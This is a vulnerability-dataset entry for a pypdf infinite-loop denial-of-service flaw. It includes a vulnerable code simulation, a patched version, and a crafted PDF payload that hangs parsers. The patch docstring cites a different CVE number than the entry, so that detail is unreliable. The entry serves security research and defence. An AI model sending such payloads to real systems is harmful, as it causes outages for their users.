VAITP Dataset

← Back to the dataset

CVE-2026-59936

pypdf: Unterminated inline image in a PDF causes an infinite loop (DoS).

  • CVSS 8.7
  • CWE-400
  • Resource Management
  • Remote

pypdf is a free and open-source pure-python PDF library. Prior to 6.14.1, an attacker can craft a PDF with a page content stream containing a not terminated inline image, causing an infinite loop during inline image end marker detection such as when extracting page text. This issue is fixed in version 6.14.1.

CVSS base score
8.7
Published
2026-07-08
OWASP
A04 Insecure Design
Orthogonal defect classification
Checking
Code defect classification
Missing Check
Category
Resource Management
Subcategory
Resource Exhaustion
Accessibility scope
Remote
Impact
Denial of Service (DoS)
Affected component
pypdf
Fixed by upgrading
Yes

Solution

Upgrade `pypdf` to version 6.14.1 or later.

Vulnerable code sample

import io

def vulnerable_pypdf_parser_simulation(stream_bytes):
    """
    This function simulates the vulnerable part of the pypdf library.
    It processes a stream and looks for an inline image. When it finds the
    'BI' (Begin Image) marker, it enters a loop to find the 'EI' (End Image)
    marker. The vulnerability lies in this inner loop's failure to handle
    the end of the stream if 'EI' is not present.
    """
    stream = io.BytesIO(stream_bytes)
    # Simplified token scanning.
    while True:
        token = stream.read(3).strip() # Read potential operators
        if not token:
            break # End of stream reached normally

        if token == b'BI':
            # Found the start of an inline image.
            # Now, enter the vulnerable loop to find the end marker.
            while True:
                # The real code is more complex, but the flawed principle is the same:
                # it reads from the stream expecting to eventually find 'EI'.
                data_chunk = stream.readline()

                # If the 'EI' marker is missing and the end-of-stream is reached,
                # readline() will repeatedly return b''. The check for 'EI' will
                # always be false, and there is no break condition for an empty
                # data_chunk, causing an infinite loop.
                if b'EI' in data_chunk:
                    break
    
# This byte string represents a crafted PDF content stream.
# It includes the 'BI' (Begin Image) operator but is missing the required
# 'EI' (End Image) terminator.
malicious_stream_without_end_marker = b"""
(Some text before) Tj
BI
/W 10
/H 10
ID
xxxxxxxxxxxxxxxxxxxxxx
% The EI marker that should be here is missing.
(Some text after) Tj
"""

# Calling the simulated parser on the malicious stream will cause it to hang
# in an infinite loop, demonstrating the vulnerability.
vulnerable_pypdf_parser_simulation(malicious_stream_without_end_marker)

# The program will not proceed beyond this point.
print("This line will never be reached.")

Patched code sample

import io

def _safe_scan_for_end_of_inline_image(stream: io.BytesIO) -> None:
    """
    A conceptual representation of the fix for CVE-2023-39936 in pypdf.

    The original vulnerability was an infinite loop when a PDF's inline image
    data was not terminated by an 'EI' (End Image) marker. The code would
    continuously try to read from a stream that had already ended.

    The fix ensures the loop terminates by checking the current stream
    position against its total length, preventing an infinite loop.

    Args:
        stream: A stream object simulating PDF content. For this example,
                it is assumed the stream reader is positioned right after
                the 'BI' (Begin Image) marker.
    """
    # Before entering the loop, determine the absolute end of the stream.
    current_pos = stream.tell()
    stream.seek(0, io.SEEK_END)
    stream_length = stream.tell()
    stream.seek(current_pos)  # Restore original position

    data_scanned = b""
    end_marker = b"EI"

    # The vulnerable code would loop infinitely here if 'EI' was missing.
    while end_marker not in data_scanned:
        # THE FIX: Check if the stream's end has been reached.
        # This prevents an infinite loop on a malformed stream.
        if stream.tell() >= stream_length:
            # End of stream reached, but 'EI' marker was not found.
            # Stop scanning to prevent an infinite loop.
            break

        # Continue reading data to find the end marker.
        # In a real implementation, this would read smaller chunks.
        data_scanned += stream.read(20)

    # The function now safely exits even if the 'EI' marker is never found.
    # To demonstrate, we can check the result.
    if end_marker in data_scanned:
        print("Safely found 'EI' marker.")
    else:
        print("Safely terminated scanning: 'EI' marker was not found.")


if __name__ == '__main__':
    # This simulates a malformed PDF stream with a Begin Image ('BI')
    # but no corresponding End Image ('EI'). The vulnerable code would
    # loop forever on this stream.
    malformed_stream = io.BytesIO(b"\x00\x01\x02malformed image data that never ends")

    print("Processing a malformed stream that would cause an infinite loop...")
    _safe_scan_for_end_of_inline_image(malformed_stream)

    # This simulates a well-formed stream for comparison.
    well_formed_stream = io.BytesIO(b"\x00\x01\x02 some image data EI more data")
    print("\nProcessing a well-formed stream...")
    _safe_scan_for_end_of_inline_image(well_formed_stream)

Payload

%PDF-1.7
1 0 obj
<</Type /Catalog /Pages 2 0 R>>
endobj
2 0 obj
<</Type /Pages /Kids [3 0 R] /Count 1>>
endobj
3 0 obj
<</Type /Page /Parent 2 0 R /MediaBox [0 0 10 10] /Contents 4 0 R>>
endobj
4 0 obj
<</Length 25>>
stream
BI /W 1 /H 1 /CS /D ID A
endstream
endobj
xref
0 5
0000000000 65535 f
0000000009 00000 n
0000000056 00000 n
0000000113 00000 n
0000000192 00000 n
trailer
<</Size 5/Root 1 0 R>>
startxref
255
%%EOF

Cite this entry

@misc{vaitp:cve202659936,
  title        = {{pypdf: Unterminated inline image in a PDF causes an infinite loop (DoS).}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2026},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2026-59936},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-59936/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::